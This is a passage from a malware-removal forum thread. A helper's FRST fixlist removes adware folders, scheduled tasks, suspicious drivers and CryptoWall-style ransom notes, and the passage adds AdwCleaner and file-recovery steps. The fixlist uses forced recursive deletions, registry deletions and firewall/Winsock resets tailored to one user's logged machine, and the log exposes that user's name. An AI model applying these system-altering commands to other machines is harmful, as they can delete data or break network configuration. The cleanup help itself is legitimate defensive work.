2015-10-15 00:30 - 2015-10-16 20:43 - 00000000 ___HD C:\b43abdf8
2015-10-16 20:52 - 2015-05-06 20:53 - 00000000 ____D C:\Users\christopher lane\AppData\Local\0F93F772-12CD-4FC8-933A-3F0CB721F46D.aplzod
2015-10-16 20:52 - 2011-12-09 09:00 - 00000000 ____D C:\Users\christopher lane\AppData\LocalLow\Conduit
2015-10-11 01:53 - 2015-09-05 00:09 - 00003506 _____ C:\WINDOWS\System32\Tasks\{52C5C532-AD6E-400C-9FA8-C8F3334D7162}
2015-09-21 01:34 - 2015-06-06 18:31 - 00000000 ____D C:\Program Files (x86)\ShOpDrop
2015-09-21 01:34 - 2015-06-06 18:30 - 00000000 ____D C:\Program Files (x86)\ShopDroop
2015-09-21 01:34 - 2015-06-06 18:30 - 00000000 ____D C:\Program Files (x86)\ShoopDrop
2015-09-21 01:34 - 2015-05-28 02:46 - 00000000 ____D C:\Program Files (x86)\PriceMienuS
2015-09-21 01:32 - 2015-06-28 00:10 - 00000000 ____D C:\Program Files (x86)\DisCouanntExtEnsii
2015-04-19 05:20 - 2015-04-19 05:20 - 0005872 _____ () C:\Users\christopher lane\AppData\Roaming\rcyDrYnUALG
2014-09-01 01:18 - 2014-09-01 01:18 - 0001248 _____ () C:\Users\christopher lane\AppData\Roaming\UUJLZX
2013-06-18 21:24 - 2013-06-18 21:24 - 0001518 ___SH () C:\Users\christopher lane\AppData\Local\6o4v7yr6ikfw18072u
Task: {00DE99B8-DFBC-4149-8066-A37C50C1D789} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {1229EC21-A2E9-4427-A75A-CC89848EC0B5} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {22B8C5DF-0407-4997-B4BE-BF090092A842} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {372EF667-968E-4EEB-ADAA-5153B8E0CA99} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {409668D3-6767-48FD-8092-F9F52B383387} - System32\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv => C:\Windows\TEMP\{4ED59BE2-DDE9-40E9-B7E5-E736C598DC80}.exe
Task: {58BB53CA-C89E-4295-A525-6F54BB99D339} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {85B2B832-767A-4553-9C17-C9C8F287ABB9} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {AB3FC943-C92B-41FF-A7D0-B12F2DDDABCB} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {BDB9C31B-D9B0-40E7-9CB3-2F18E1B11738} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {C7907EBD-82A1-4F10-ABCB-0C460DEFD4F8} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {D29D4C4E-A5D0-4C33-B8FC-D60469D71774} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: C:\WINDOWS\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv.job => C:\Windows\TEMP\{4ED59BE2-DDE9-40E9-B7E5-E736C598DC80}.exe <==== ATTENTION
AlternateDataStreams: C:\WINDOWS\system32\Drivers\fmdqszsv.sys:changelist
AlternateDataStreams: C:\WINDOWS\system32\Drivers\lrvcraza.sys:changelist
AlternateDataStreams: C:\WINDOWS\system32\Drivers\pqmpvedg.sys:changelist
C:\WINDOWS\system32\Drivers\fmdqszsv.sys
C:\WINDOWS\system32\Drivers\lrvcraza.sys
C:\WINDOWS\system32\Drivers\pqmpvedg.sys
CMD: del /F /Q /S "C:\HELP_DECRYPT.HTML"
CMD: del /F /Q /S "C:\HELP_DECRYPT.PNG"
CMD: del /F /Q /S "C:\HELP_DECRYPT.URL"
CMD: del /F /Q /S "C:\HELP_DECRYPT.TXT"
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
RemoveProxy:
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: ipconfig /flushdns
CMD: netsh winsock reset catalog
CMD: netsh int ip reset c:\resetlog.txt
CMD: ipconfig /release
CMD: ipconfig /renew
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
EmptyTemp:
CMD: bitsadmin /reset /allusers

Save this as fixlist.txt, in the same location as FRST.exe

Run FRST and press Fix
On completion a log will be generated please post that

THEN

Please download AdwCleaner by Xplode onto your desktop.

Close all open programs and internet browsers.
Double click on AdwCleaner.exe to run the tool.
Click on Scan.
After the scan is complete click on "Clean"
Confirm each time with Ok.
Your computer will be rebooted automatically. A text file will open after the restart.
Please post the content of that logfile with your next answer.
You can find the logfile at C:\AdwCleaner[S0].txt as well.

The following may or may not help with the recovery of some files :

Previous Versions

Right-click the file/folder and click Properties.
Click Previous Versions.
This tab will list all copies of the file and the date they were backed up.
To restore a particular version of the file, click Copy and select the directory you wish to restore the file to.
If you wish to restore the selected file and replace the existing one, click Restore
If you wish to view the contents of the file before restoring, click Open.

ShadowExplorer

Please download ShadowExplorer and save the file to your Desktop
Right-Click ShadowExplorer-0.9-portable.zip and click Extract All. Select your Desktop and click Extract
Right-Click ShadowExplorer.exe and select run as administrator [/b]to run the programme.
You will see a drop-down menu with the shadow copies of all partitions and disks present.
Click C:\ from the drop-down menu.
To the right, pick a date prior to the infection from the drop-down menu.
To restore a whole folder, right-click on your desired folder and click Export. You will then be prompted as to where you would like to restore the contents of the folder to.

File Recovery Software
File Recovery Software may be able to recover the original file deleted by the infection. Please bear in mind, the more you use the machine after the files are encrypted, the harder it will be for the recovery software to recover your files.

#3
Essexboy

Posted 22 October 2015 - 07:12 AM

GeekU Moderator

Retired Staff
69,964 posts

Due to lack of feedback, this topic has been closed.

If you need this topic reopened, please contact a staff member. This applies only to the original topic starter. Everyone else please begin a New Topic.